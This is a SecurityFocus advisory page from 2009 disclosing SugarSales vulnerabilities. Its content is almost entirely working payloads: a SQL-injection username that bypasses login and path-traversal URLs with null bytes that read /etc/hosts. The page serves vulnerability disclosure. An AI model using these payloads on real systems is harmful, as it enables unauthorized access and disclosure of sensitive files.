Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SugarSales Multiple Remote Vulnerabilities

Example URIs sufficient to exploit these vulnerabilities have been provided:

To log into SugarSales, utilize the username "admin' or 1=1 -- " with any password.

To disclose the contents of potentially sensitive files:
http://www.example.com/sugarcrm/modules/Users/Login.php?theme=/../../../etc/hosts%00
http://www.example.com/sugarcrm/modules/Calls/index.php?theme=/../../../etc/hosts%00







 

Privacy Statement
Copyright 2009, SecurityFocus